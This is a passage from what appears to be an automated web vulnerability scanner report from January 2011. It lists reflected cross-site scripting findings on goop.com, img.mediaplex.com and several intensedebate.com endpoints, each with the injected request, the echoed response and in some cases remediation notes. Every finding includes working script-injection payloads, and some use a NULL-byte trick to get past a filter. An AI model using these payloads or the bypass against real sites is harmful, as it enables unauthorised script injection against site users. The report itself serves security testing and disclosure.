The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00e6684<script>alert(1)</script>43a55766fd0 was submitted in the REST URL parameter 1. This input was echoed as e6684<script>alert(1)</script>43a55766fd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /favicon.ico%00e6684<script>alert(1)</script>43a55766fd0 HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000; __utmz=108318356.1296508226.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=108318356.340624538.1296508226.1296508226.1296508226.1; __utmc=108318356; __utmb=108318356.1.10.1296508226

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:43 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 513

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:43 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/favicon.ico%00e6684<script>alert(1)</script>43a55766fd0</b>
...[SNIP]...

1.20. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 810d7<script>alert(1)</script>33ccebc9f2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js810d7<script>alert(1)</script>33ccebc9f2e/AC_RunActiveContent.js HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:04 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 524

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:04 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/js810d7<script>alert(1)</script>33ccebc9f2e/AC_RunActiveContent.js</b>
...[SNIP]...

1.21. http://goop.com/js/AC_RunActiveContent.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goop.com
Path:   /js/AC_RunActiveContent.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00b45ab<script>alert(1)</script>a4768d1993d was submitted in the REST URL parameter 2. This input was echoed as b45ab<script>alert(1)</script>a4768d1993d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /js/AC_RunActiveContent.js%00b45ab<script>alert(1)</script>a4768d1993d HTTP/1.1
Host: goop.com
Proxy-Connection: keep-alive
Referer: http://goop.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServergoop.com_http_pool=2720336906.20480.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:11:28 GMT
Server: Apache
Served-By: Joyent
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 527

<html>
<head>
   <title> 404 Error Page</title>
</head>
<body style="text-align:center; background-color:#F7F7F7; ">
   <h2>Sorry... Page Not Found...</h2>
(Mon Jan 31 2011 9:11:28 pm GMT)

   <br><br>
   IP
...[SNIP]...
<b>goop.com/js/AC_RunActiveContent.js%00b45ab<script>alert(1)</script>a4768d1993d</b>
...[SNIP]...

1.22. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/120648/2302-rsa-banner-728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7204"%3balert(1)//5086f535233 was submitted in the mpck parameter. This input was echoed as a7204";alert(1)//5086f535233 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398a7204"%3balert(1)//5086f535233&mpt=7163398&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3aa0/3/0/%2a/e%3B235326809%3B0-0%3B1%3B37997683%3B3454-728/90%3B40413144/40430931/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:47 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT
ETag: "43e67e-bfe-49a4c7ee56f00"
Accept-Ranges: bytes
Content-Length: 5698
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<a href=\"http://ad.uk.doubleclick.net/click;h=v8/3aa0/3/0/*/e;235326809;0-0;1;37997683;3454-728/90;40413144/40430931/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/15017-120648-34880-0?mpt=7163398a7204";alert(1)//5086f535233\" target=\"_blank\">
...[SNIP]...

1.23. http://img.mediaplex.com/content/0/15017/120648/2302-rsa-banner-728x90.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/120648/2302-rsa-banner-728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abd4e"%3balert(1)//d8d83967ba2 was submitted in the mpvc parameter. This input was echoed as abd4e";alert(1)//d8d83967ba2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/120648/2302-rsa-banner-728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398&mpt=7163398&mpvc=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3aa0/3/0/%2a/e%3B235326809%3B0-0%3B1%3B37997683%3B3454-728/90%3B40413144/40430931/1%3B%3B%7Esscs%3D%3fabd4e"%3balert(1)//d8d83967ba2 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=517004695355; mojo3=15017:34880/9609:2042/11606:17922/14302:28901/1551:17023/11293:3113

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:49 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 19:54:04 GMT
ETag: "43e67e-bfe-49a4c7ee56f00"
Accept-Ranges: bytes
Content-Length: 5674
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
<PARAM NAME=\"FlashVars\" VALUE=\"clickTAG=http://ad.uk.doubleclick.net/click;h=v8/3aa0/3/0/*/e;235326809;0-0;1;37997683;3454-728/90;40413144/40430931/1;;~sscs=?abd4e";alert(1)//d8d83967ba2http://altfarm.mediaplex.com%2Fad%2Fck%2F15017-120648-34880-0%3Fmpt%3D7163398&clickTag=http://ad.uk.doubleclick.net/click;h=v8/3aa0/3/0/*/e;235326809;0-0;1;37997683;3454-728/90;40413144/40430931/1;;~ss
...[SNIP]...

1.24. http://intensedebate.com/comment/dd5b14065e2bc9e2bfced67832069618/generic/73522711 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /comment/dd5b14065e2bc9e2bfced67832069618/generic/73522711

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3765f'><script>alert(1)</script>d66da1f0de2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comment3765f'><script>alert(1)</script>d66da1f0de2/dd5b14065e2bc9e2bfced67832069618/generic/73522711 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4751

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/comment3765f'><script>alert(1)</script>d66da1f0de2/dd5b14065e2bc9e2bfced67832069618/generic/73522711'>
...[SNIP]...

1.25. http://intensedebate.com/empty.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d43c7'><script>alert(1)</script>b83048b6d9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.phpd43c7'><script>alert(1)</script>b83048b6d9a HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4701

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.phpd43c7'><script>alert(1)</script>b83048b6d9a'>
...[SNIP]...

1.26. http://intensedebate.com/empty.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /empty.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 103fc'><script>alert(1)</script>64edd2460e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /empty.php/103fc'><script>alert(1)</script>64edd2460e8 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4699

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/empty.php/103fc'><script>alert(1)</script>64edd2460e8'>
...[SNIP]...

1.27. http://intensedebate.com/fb-connect/fbConnect.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/fbConnect.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2cc27'><script>alert(1)</script>605cb6e27a0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/fbConnect.php2cc27'><script>alert(1)</script>605cb6e27a0 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4805

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.php2cc27'><script>alert(1)</script>605cb6e27a0'>
...[SNIP]...

1.28. http://intensedebate.com/fb-connect/fbConnect.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/fbConnect.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3738a'><script>alert(1)</script>b1874870dbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/fbConnect.php/3738a'><script>alert(1)</script>b1874870dbc HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4806

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/fbConnect.php/3738a'><script>alert(1)</script>b1874870dbc'>
...[SNIP]...

1.29. http://intensedebate.com/fb-connect/getFB.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/getFB.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload df44a'><script>alert(1)</script>671aa9063a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/getFB.phpdf44a'><script>alert(1)</script>671aa9063a9 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4805

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.phpdf44a'><script>alert(1)</script>671aa9063a9'>
...[SNIP]...

1.30. http://intensedebate.com/fb-connect/getFB.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /fb-connect/getFB.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3d112'><script>alert(1)</script>1432c2f74b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb-connect/getFB.php/3d112'><script>alert(1)</script>1432c2f74b9 HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4802

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/fb-connect/getFB.php/3d112'><script>alert(1)</script>1432c2f74b9'>
...[SNIP]...

1.31. http://intensedebate.com/idc/js/comment-func.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81127'><script>alert(1)</script>04c9e41e5e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.php81127'><script>alert(1)</script>04c9e41e5e9?token=JyC7TUrDqHsAt8x9KTtYkQqi0Pk09rxT&blogpostid=73522711&time=1296491549666 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4791

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php81127'><script>alert(1)</script>04c9e41e5e9?token=JyC7TUrDqHsAt8x9KTtYkQqi0Pk09rxT&blogpostid=73522711&time=1296491549666'>
...[SNIP]...

1.32. http://intensedebate.com/idc/js/comment-func.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /idc/js/comment-func.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6bf69'><script>alert(1)</script>a0620b0aaaa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /idc/js/comment-func.php/6bf69'><script>alert(1)</script>a0620b0aaaa HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4810

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/idc/js/comment-func.php/6bf69'><script>alert(1)</script>a0620b0aaaa'>
...[SNIP]...

1.33. http://intensedebate.com/js/genericCommentWrapper2.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a24a3'><script>alert(1)</script>8d493091df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/genericCommentWrapper2.phpa24a3'><script>alert(1)</script>8d493091df?acct=dd5b14065e2bc9e2bfced67832069618&postid=195310&title=Microsoft%20warns%20of%20Internet%20Explorer%20XSS%20flaw%20in%20all%20versions%20of%20Windows%20-%20SC%20Magazine%20UK&url=http%3A%2F%2Fwww.scmagazineuk.com%2Fmicrosoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows%2Farticle%2F195310%2F HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:11:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 5030

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/genericCommentWrapper2.phpa24a3'><script>alert(1)</script>8d493091df?acct=dd5b14065e2bc9e2bfced67832069618&postid=195310&title=Microsoft%20warns%20of%20Internet%20Explorer%20XSS%20flaw%20in%20all%20versions%20of%20Windows%20-%20SC%20Magazine%20UK&url=http%3A%2F%2Fwww.s
...[SNIP]...

1.34. http://intensedebate.com/js/genericCommentWrapper2.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intensedebate.com
Path:   /js/genericCommentWrapper2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b0f4'><script>alert(1)</script>82f6491ebe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/genericCommentWrapper2.php/1b0f4'><script>alert(1)</script>82f6491ebe HTTP/1.1
Host: intensedebate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:25:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 4814

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
